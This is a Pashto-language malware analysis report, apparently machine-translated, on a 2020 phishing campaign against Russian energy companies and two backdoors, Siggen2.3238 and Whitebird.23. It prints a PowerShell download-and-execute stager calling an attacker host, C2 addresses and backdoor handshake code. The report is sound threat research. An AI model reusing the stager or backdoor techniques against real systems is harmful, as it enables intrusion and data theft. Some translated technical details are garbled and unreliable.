د کمپیوټر امنیتي پیښو په څیړلو کې زموږ تجربه ښیي چې بریښنالیک لاهم یو له خورا عام چینلونو څخه دی چې د برید کونکو لخوا کارول کیږي په پیل کې د برید شوي شبکې زیربنا ته ننوځي. د شکمن (یا دومره شکمن نه) لیک سره یو بې پروایی عمل د نورو انتاناتو لپاره د ننوتلو نقطه کیږي، له همدې امله سایبر جنایتکاران په فعاله توګه د ټولنیز انجینرۍ میتودونه کاروي، که څه هم د بریالیتوب مختلف درجې سره.
پدې پوسټ کې موږ غواړو د سپیم کمپاین په اړه زموږ د وروستي تحقیقاتو په اړه وغږیږو چې د روسیې د تیلو او انرژي کمپلیکس کې یو شمیر تصدۍ په نښه کوي. ټول بریدونه د جعلي بریښنالیکونو په کارولو سره ورته سناریو تعقیبوي، او هیڅوک داسې نه بریښي چې د دې بریښنالیکونو متن مینځپانګه کې ډیره هڅه کړې وي.
استخباراتي خدمت
دا ټول د اپریل 2020 په پای کې پیل شوي، کله چې د ډاکټر ویب ویروس شنونکو د سپیم کمپاین کشف کړ چې په کې هیکرانو د روسیې د تیلو او انرژي کمپلیکس کې د یو شمیر شرکتونو کارمندانو ته د تلیفون تازه لارښود لیږلی و. البته، دا د اندیښنې ساده نمایش نه و، ځکه چې ډایرکټر ریښتیا نه و، او د .docx اسنادو دوه عکسونه د لیرې سرچینو څخه ډاونلوډ کړل.
یو له دوی څخه د خبرونو [.]zannews[.]com سرور څخه د کارونکي کمپیوټر ته ډاونلوډ شوی و. د یادونې وړ ده چې د ډومین نوم د قزاقستان د فساد ضد رسنیو مرکز ډومین ته ورته دی - zannews[.]kz. له بلې خوا، کارول شوی ډومین سمدلاسه د بل 2015 کمپاین یادونه کوي چې د TOPNEWS په نوم پیژندل کیږي، کوم چې د ICEFOG شاته دروازه کارولې او د دوی په نومونو کې د "خبرونو" سبسټرینګ سره د Trojan کنټرول ډومینونه درلودل. بله په زړه پورې ځانګړتیا دا وه چې کله مختلف ترلاسه کونکو ته بریښنالیکونه واستول شي ، د عکس ډاونلوډ کولو غوښتنه یا د مختلف غوښتنې پیرامیټرې یا ځانګړي عکس نومونه کارول کیږي.
موږ باور لرو چې دا د معلوماتو راټولولو په هدف ترسره شوي ترڅو د "باور وړ" ادرس ورکوونکي وپیژني، چې بیا به په مناسب وخت کې د لیک خلاصولو تضمین شي. د SMB پروتوکول د دوهم سرور څخه عکس ډاونلوډ کولو لپاره کارول شوی و ، کوم چې د کارمندانو کمپیوټرونو څخه د NetNTLM هشونو راټولولو لپاره ترسره کیدی شي چې ترلاسه شوي سند خلاص کړي.
او دلته پخپله د جعلي لارښود سره لیک دی:
د دې کال په جون کې، هیکرانو د عکسونو اپلوډ کولو لپاره د سپورت[.]manhajnews[.]com په نوم د نوي ډومین نوم کارول پیل کړل. تحلیل ښودلې چې manhajnews[.]com فرعي ډومینونه لږترلږه د سپتمبر 2019 راهیسې په سپیم پیغامونو کې کارول شوي. د دې کمپاین یو هدف د روسیې یو لوی پوهنتون و.
همدارنګه، د جون په میاشت کې، د برید تنظیم کونکي د خپلو لیکونو لپاره د نوي متن سره راغلل: دا ځل په سند کې د صنعت پراختیا په اړه معلومات شامل وو. د لیک متن په روښانه توګه په ډاګه کوي چې لیکوال یا د روسیې اصلي ویناوال نه و، یا په قصدي توګه د ځان په اړه دا ډول تاثر رامینځته کوي. له بده مرغه، د صنعت پراختیا نظریات، د تل په څیر، یوازې یو پوښ و - سند بیا دوه عکسونه ډاونلوډ کړل، پداسې حال کې چې سرور د ډاونلوډ لپاره بدل شوی [.]inklingpaper[.]com.
راتلونکی نوښت د جولای په میاشت کې تعقیب شو. د انټي ویروس برنامو لخوا د ناوړه اسنادو کشف کولو څخه د مخنیوي په هڅه کې ، برید کونکو د مایکروسافټ ورډ سندونو کارول پیل کړل چې د پټنوم سره کوډ شوي. په ورته وخت کې، برید کونکو پریکړه وکړه چې د کلاسیک ټولنیز انجینرۍ تخنیک وکاروي - د انعام خبرتیا.
د استیناف متن بیا په ورته انداز لیکل شوی و، چې د مخاطب په منځ کې یې نور شکونه راپورته کړل. د عکس ډاونلوډ کولو سرور هم نه دی بدل شوی.
په یاد ولرئ چې په ټولو قضیو کې، بریښنایی میل باکسونه په بریښنالیک کې ثبت شوي [.]ru او yandex[.]ru ډومینونه د لیکونو لیږلو لپاره کارول شوي.
برید
د سپتمبر 2020 په پیل کې، دا د عمل وخت و. زموږ د ویروس شنونکو د بریدونو نوې څپې ثبت کړې، په کوم کې چې برید کونکو بیا د تلیفون لارښود تازه کولو په پلمه لیکونه لیږلي. په هرصورت، دا ځل ضمیمه یو ناوړه میکرو درلود.
کله چې ضمیمه شوي سند خلاص کړئ ، میکرو دوه فایلونه رامینځته کړي:
- د VBS سکریپټ %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs، چې موخه یې د بیچ فایل پیلول وو؛
- د بیچ فایل پخپله %APPDATA%configstest.bat، کوم چې مبهم وو.
د دې کار جوهر د ځانګړو پیرامیټونو سره د پاورشیل شیل په لاره اچولو کې راځي. هغه پیرامیټونه چې شیل ته لیږدول شوي په کمانډونو کې کوډ شوي دي:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;لکه څنګه چې د وړاندې شوي کمانډونو څخه په لاندې ډول دي، هغه ډومین چې له هغې څخه تادیه ډاونلوډ کیږي بیا د خبر سایټ په توګه پټ شوی. یو ساده ، چې یوازینۍ دنده یې د کمانډ او کنټرول سرور څخه شیل کوډ ترلاسه کول او اجرا کول دي. موږ وکولی شو دوه ډوله شاته دروازې وپیژنو چې د قرباني په کمپیوټر کې نصب کیدی شي.
BackDoor.Siggen2.3238
لومړی یو دی BackDoor.Siggen2.3238 - زموږ متخصصین مخکې نه و مخ شوي، او د نورو انټي ویروس پلورونکو لخوا د دې برنامه یادونه هم نه وه شوې.
دا برنامه په C++ کې لیکل شوې شاته دروازه ده او په 32-bit وینډوز عملیاتي سیسټمونو کې روانه ده.
BackDoor.Siggen2.3238 د دوه پروتوکولونو په کارولو سره د مدیریت سرور سره د خبرو اترو توان لري: HTTP او HTTPS. ازموینه شوې نمونه د HTTPS پروتوکول کاروي. لاندې کارن-ایجنټ سرور ته په غوښتنو کې کارول کیږي:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
په دې حالت کې، ټولې غوښتنې د لاندې پیرامیټونو سره چمتو کیږي:
%s;type=%s;length=%s;realdata=%send
چیرې چې هره کرښه %s په ورته ډول د دې لخوا بدلیږي:
- د اخته شوي کمپیوټر ID
- د لیږلو غوښتنې ډول،
- د ریښتیني معلوماتو ساحه کې د معلوماتو اوږدوالی،
- ډاټا.
د اخته شوي سیسټم په اړه د معلوماتو راټولولو په مرحله کې، شاته دروازه یو کرښه رامینځته کوي لکه:
lan=%s;cmpname=%s;username=%s;version=%s;
چیرته چې lan د اخته شوي کمپیوټر IP پته ده، cmpname د کمپیوټر نوم دی، کارن نوم د کارونکي نوم دی، نسخه 0.0.4.03 کرښه ده.
دا معلومات د sysinfo پیژندونکي سره د POST غوښتنې له لارې د کنټرول سرور ته لیږل کیږي چې په https[:]//31.214[.]157.14/log.txt کې موقعیت لري. که په ځواب کې BackDoor.Siggen2.3238 د زړه سیګنال ترلاسه کوي، اړیکه بریالۍ ګڼل کیږي، او شاته دروازه د سرور سره د اړیکو اصلي دوره پیل کوي.
د عملیاتي اصولو نور بشپړ توضیحات BackDoor.Siggen2.3238 زموږ کې دی .
Backdoor.Whitebird.23
دوهم پروګرام د BackDoor.Whitebird backdoor تعدیل دی، مخکې له دې چې موږ په قزاقستان کې د یوې دولتي ادارې سره د پیښې څخه خبر شو. دا نسخه په C++ کې لیکل شوې او د 32-bit او 64-bit وینډوز عملیاتي سیسټمونو کې د چلولو لپاره ډیزاین شوې.
د دې ډول ډیری برنامو په څیر ، Backdoor.Whitebird.23 د کنټرول سرور او د اخته شوي کمپیوټر غیر مجاز کنټرول سره د کوډ شوي پیوستون رامینځته کولو لپاره ډیزاین شوی. د ډراپر په کارولو سره جوړ شوي سیسټم کې نصب شوی .
هغه نمونه چې موږ یې معاینه کړې د دوه صادراتو سره یو ناوړه کتابتون و:
- ګوګل پلی
- ازموینه
د خپل کار په پیل کې، دا د بایټ 0x99 سره د XOR عملیاتو پراساس د الګوریتم په کارولو سره د شاته دروازې بدن کې هارډ وائر شوی ترتیب کوډ کوي. تشکیلات داسې ښکاري:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
د دې دوامداره عملیاتو ډاډ ترلاسه کولو لپاره ، شاته دروازه په ساحه کې ټاکل شوي ارزښت بدلوي کاري_ساعتونه تشکیلات ساحه 1440 بایټ لري، کوم چې ارزښتونه 0 یا 1 اخلي او په ورځ کې د هر ساعت هره دقیقه استازیتوب کوي. د هرې شبکې انٹرفیس لپاره یو جلا تار رامینځته کوي چې انٹرفیس ته غوږ نیسي او د اخته شوي کمپیوټر څخه پراکسي سرور کې د واک ورکولو کڅوړې ګوري. کله چې دا ډول کڅوړه وموندل شي، شاته دروازه خپل لیست ته د پراکسي سرور په اړه معلومات اضافه کوي. برسېره پردې، د WinAPI له لارې د پراکسي شتون لپاره چک کوي InternetQueryOptionW.
برنامه اوسنۍ دقیقې او ساعت ګوري او په ساحه کې د معلوماتو سره پرتله کوي کاري_ساعتونه تشکیلات که د ورځې اړوند دقیقې ارزښت صفر نه وي ، نو د کنټرول سرور سره اړیکه رامینځته کیږي.
د سرور سره د پیوستون رامینځته کول د پیرودونکي او سرور ترمینځ د TLS نسخه 1.0 پروتوکول په کارولو سره د پیوستون رامینځته کول سموي. د شاته دروازې بدن دوه بفرونه لري.
لومړی بفر د TLS 1.0 پیرودونکي هیلو پاکټ لري.
دوهم بفر د 1.0x0 بایټ کلیدي اوږدوالي سره د TLS 100 کلینټ کیلي ایکسچینج پاکټونه لري ، د سایفر سپیک بدلوي ، د کوډ شوي لاسي شیک پیغام.
کله چې د پیرودونکي هیلو پیکټ واستوئ ، نو شاته دروازه د اوسني وخت 4 بایټونه او د پیرودونکي تصادفي ساحې کې 28 بایټس سیډو تصادفي ډیټا لیکي ، چې په لاندې ډول محاسبه کیږي:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
ترلاسه شوی کڅوړه د کنټرول سرور ته لیږل کیږي. ځواب (سرور هیلو پیکټ) چک کوي:
- د TLS پروتوکول نسخه 1.0 سره مطابقت؛
- د مهال ویش سره مطابقت (د تصادفي ډیټا پیکټ ساحې لومړی 4 بایټ) د پیرودونکي لخوا د سرور لخوا ټاکل شوي ټایم سټیمپ ته مشخص شوی؛
- د پیرودونکي او سرور په تصادفي ډیټا ساحه کې د ټایم سټمپ وروسته د لومړي 4 بایټ میچ.
د ټاکل شوي میچونو په صورت کې، شاته دروازه د پیرودونکي کیلي تبادلې پاکټ چمتو کوي. د دې کولو لپاره، دا د پیرودونکي کیلي تبادلې کڅوړه کې عامه کیلي بدلوي، په بیله بیا د کوډ شوي لاسي شیک پیغام کڅوړه کې د کوډ کولو IV او کوډ کولو ډاټا.
شاته دروازه بیا د کمانډ او کنټرول سرور څخه پاکټ ترلاسه کوي ، ګوري چې د TLS پروتوکول نسخه 1.0 ده ، او بیا نور 54 بایټونه مني (د پاکټ بدن). دا د پیوستون تنظیم بشپړوي.
د عملیاتي اصولو نور بشپړ توضیحات Backdoor.Whitebird.23 زموږ کې دی .
پایله او پایله
د اسنادو تحلیل، مالویر، او کارول شوي زیربنا موږ ته اجازه راکوي چې په ډاډ سره ووایو چې برید د چینایي APT ډلې لخوا چمتو شوی و. د شاته دروازو د فعالیت په پام کې نیولو سره چې د بریالي برید په صورت کې د قربانیانو په کمپیوټرونو کې نصب شوي، انفیکشن لږترلږه د برید شوي سازمانونو کمپیوټرونو څخه د محرم معلوماتو غلا ته الرښوونه کوي.
سربیره پردې ، خورا احتمالي سناریو د ځانګړي فعالیت سره په محلي سرورونو کې د ځانګړي ټروجن نصب کول دي. دا کیدای شي د ډومین کنټرولر، میل سرورونه، د انټرنیټ دروازې، او داسې نور وي لکه څنګه چې موږ په مثال کې لیدلی شو , دا ډول سرورونه د مختلفو دلیلونو لپاره د برید کونکو لپاره ځانګړې دلچسپي لري.
سرچینه: www.habr.com